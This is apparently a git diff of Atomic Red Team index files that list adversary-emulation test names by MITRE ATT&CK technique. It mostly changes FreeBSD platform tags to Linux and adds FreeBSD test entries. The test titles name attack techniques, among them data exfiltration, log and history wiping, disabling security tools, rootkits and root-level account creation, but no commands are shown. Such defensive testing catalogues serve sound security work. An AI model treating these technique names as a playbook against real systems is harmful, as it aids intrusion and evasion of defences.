(FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux] + - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux] + - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux] + - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux] - Atomic Test #5: PureLocker Ransom Note [windows] - Atomic Test #6: Encrypt files using 7z utility - macOS [macos] - Atomic Test #7: Encrypt files using openssl utility - macOS [macos] @@ -2712,11 +2712,11 @@ - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1496 Resource Hijacking](../../T1496/T1496.md) - - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux] + - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos] - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows] - - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos] + - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos] - Atomic Test #3: Overwrite deleted data on C drive [windows] - Atomic Test #4: GCP - Delete Bucket [iaas:gcp] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -2736,14 +2736,14 @@ - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #1: Shutdown System - Windows [windows] - Atomic Test #2: Restart System - Windows [windows] - - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux] - - Atomic Test #7: Reboot System via `halt` - FreeBSD [freebsd] + - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux] + - Atomic Test #7: Reboot System via `halt` - FreeBSD [linux] - Atomic Test #8: Reboot System via `halt` - Linux [linux] - - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux] - - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [freebsd] + - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux] + - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux] - Atomic Test #11: Reboot System via `poweroff` - Linux [linux] - Atomic Test #12: Logoff System - Windows [windows] @@ -2789,11 +2789,11 @@ - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows] - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows] - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [freebsd] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [freebsd] + - Atomic Test #13: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -2807,12 +2807,12 @@ - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) - Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows] - - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd] + - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux] - [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md) - Atomic Test #1: C2 Data Exfiltration [windows] - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] - - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux] + - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux] - Atomic Test #3: DNSExfiltration (doh) [windows] - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -2821,18 +2821,18 @@ - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd] + - Atomic Test #1: Data Transfer Size Limits [macos, linux] - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] - - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux] + - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux] - Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows] - Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows] - Atomic Test #6: MAZE FTP Upload [windows] - Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows] - Atomic Test #8: Python3 http.server [linux] - - Atomic Test #9: Python3 http.server (freebsd) [freebsd] + - Atomic Test #9: Python3 http.server (freebsd) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 69f3ccda93..0f43e5b454 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -5,20 +5,24 @@ - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux] - - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux] - - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux] - - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux] + - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos] + - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos] + - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos] + - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos] - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux] - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux] - - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux] + - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] + - Atomic Test #10: chflags - Remove immutable file attribute [linux] - Atomic Test #11: Chmod through c script [macos, linux] + - Atomic Test #12: Chmod through c script (freebsd) [linux] - Atomic Test #13: Chown through c script [macos, linux] + - Atomic Test #14: Chown through c script (freebsd) [linux] - T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1014 Rootkit](../../T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] @@ -28,17 +32,26 @@ - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Sudo usage (freebsd) [linux] - Atomic Test #3: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux] - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] + - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd] + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) - Atomic Test #1: rm -rf [macos, linux] + - Atomic Test #2: rm -rf [linux] + - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux] + - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux] + - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux] + - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux] - Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux] - Atomic Test #19: Overwrite Linux Mail Spool [linux] - Atomic Test #20: Overwrite Linux Log [linux] @@ -47,19 +60,28 @@ - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] + - Atomic Test #2: Clear sh history (rm) [linux] - Atomic Test #3: Clear Bash history (echo) [linux] + - Atomic Test #4: Clear sh history (echo) [linux] - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos] + - Atomic Test #6: Clear sh history (cat dev/null) [linux] - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos] + - Atomic Test #8: Clear sh history (ln dev/null) [linux] - Atomic Test #9: Clear Bash history (truncate) [linux] + - Atomic Test #10: Clear sh history (truncate) [linux] - Atomic Test #11: Clear history of a bunch of shells [linux, macos] + - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux] - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - Atomic Test #15: Disable Bash History Logging with SSH -T [linux] + - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos] - - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos] + - Atomic Test #3: Base64 decoding with Python [linux, macos] + - Atomic Test #4: Base64 decoding with Perl [linux, macos] - Atomic Test #5: Base64 decoding with shell utilities [linux, macos] - - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos] + - Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux] + - Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux] + - Atomic Test #8: Hex decoding with shell utilities [linux, macos] - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos] - Atomic Test #10: XOR decoding and command execution using Python [linux, macos] - [T1562 Impair Defenses](../../T1562/T1562.md) @@ -73,18 +95,20 @@ - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) - - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos] - - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos] - - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos] - - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos] + - Atomic Test #1: Set a file's access timestamp [linux, macos] + - Atomic Test #2: Set a file's modification timestamp [linux, macos] + - Atomic Test #3: Set a file's creation timestamp [linux, macos] + - Atomic Test #4: Modify file timestamps using reference file [linux, macos] - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #7: Stop/Start UFW firewall [linux] + - Atomic Test #8: Stop/Start Packet Filter [linux] - Atomic Test #9: Stop/Start UFW firewall systemctl [linux] - Atomic Test #10: Turn off UFW logging [linux] - Atomic Test #11: Add and delete UFW firewall rules [linux] + - Atomic Test #12: Add and delete Packet Filter rules [linux] - Atomic Test #13: Edit UFW firewall user.rules file [linux] - Atomic Test #14: Edit UFW firewall ufw.conf file [linux] - Atomic Test #15: Edit UFW firewall sysctl.conf file [linux] @@ -94,8 +118,8 @@ - Atomic Test #19: Modify/delete iptables firewall rules [linux] - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) - - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux] - - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos] + - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos] - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] @@ -104,16 +128,21 @@ - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Make and modify binary from C source (freebsd) [linux] - Atomic Test #3: Set a SetUID flag on file [macos, linux] + - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux] - Atomic Test #5: Set a SetGID flag on file [macos, linux] + - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux] - Atomic Test #7: Make and modify capabilities of a binary [linux] - Atomic Test #8: Provide the SetUID capability to a file [linux] - - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux] - - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux] + - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux] + - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux] - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux] + - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux] - Atomic Test #3: Logging Configuration Changes on Linux Host [linux] + - Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux] - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -128,16 +157,20 @@ - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) - Atomic Test #1: Disable history collection [linux, macos] + - Atomic Test #2: Disable history collection (freebsd) [linux] - Atomic Test #3: Mac HISTCONTROL [macos, linux] - Atomic Test #4: Clear bash history [linux] - Atomic Test #5: Setting the HISTCONTROL environment variable [linux] - Atomic Test #6: Setting the HISTFILESIZE environment variable [linux] + - Atomic Test #7: Setting the HISTSIZE environment variable [linux] - Atomic Test #8: Setting the HISTFILE environment variable [linux] + - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux] - Atomic Test #10: Setting the HISTIGNORE environment variable [linux] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] + - Atomic Test #2: Disable syslog (freebsd) [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] @@ -145,28 +178,30 @@ - Atomic Test #40: Suspend History [linux] - Atomic Test #41: Reboot Linux Host via Kernel System Request [linux] - Atomic Test #42: Clear Pagging Cache [linux] - - Atomic Test #43: Disable Memory Swap [freebsd, linux] + - Atomic Test #43: Disable Memory Swap [linux] - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] + - Atomic Test #2: Decode base64 Data into Script [linux] - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) - - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux] + - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux] - T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on FreeBSD [linux] - Atomic Test #3: Install root CA on Debian/Ubuntu [linux] - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) - - Atomic Test #3: C compile [freebsd, linux, macos] - - Atomic Test #4: CC compile [freebsd, linux, macos] - - Atomic Test #5: Go compile [freebsd, linux, macos] + - Atomic Test #3: C compile [linux, macos] + - Atomic Test #4: CC compile [linux, macos] + - Atomic Test #5: Go compile [linux, macos] - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -177,10 +212,11 @@ - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) - - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos] - - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos] + - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos] + - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] - Atomic Test #8: Delete Filesystem - Linux [linux] + - Atomic Test #9: Delete Filesystem - FreeBSD [linux] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) - Atomic Test #1: Binary simply packed by UPX (linux) [linux] @@ -190,15 +226,19 @@ - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md) - Atomic Test #2: Space After Filename [macos, linux] + - Atomic Test #3: Space After Filename (FreeBSD) [linux] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) - - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos] + - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) # persistence @@ -208,6 +248,7 @@ - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -216,31 +257,36 @@ - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) - Atomic Test #1: Trap EXIT [macos, linux] + - Atomic Test #2: Trap EXIT (freebsd) [linux] - Atomic Test #3: Trap SIGINT [macos, linux] + - Atomic Test #4: Trap SIGINT (freebsd) [linux] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md) - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #2: Create a user account on a FreeBSD system [linux] - Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux] + - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux] - T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux] + - Atomic Test #1: Modify SSH Authorized Keys [linux, macos] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #4: Active Directory Create Admin Account [linux] @@ -264,8 +310,9 @@ - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) - Atomic Test #1: Add command to .bash_profile [macos, linux] - Atomic Test #2: Add command to .bashrc [macos, linux] - - Atomic Test #4: Append to the system shell profile [freebsd, linux] - - Atomic Test #5: Append commands user shell profile [freebsd, linux] + - Atomic Test #3: Add command to .shrc [linux] + - Atomic Test #4: Append to the system shell profile [linux] + - Atomic Test #5: Append commands user shell profile [linux] - Atomic Test #6: System shell profile scripts [linux] - Atomic Test #7: Create/Append to .bash_logout [linux] - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -278,24 +325,31 @@ - [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #2: rc.common [linux] - Atomic Test #3: rc.local [linux] + - Atomic Test #4: rc.local (FreeBSD) [linux] - 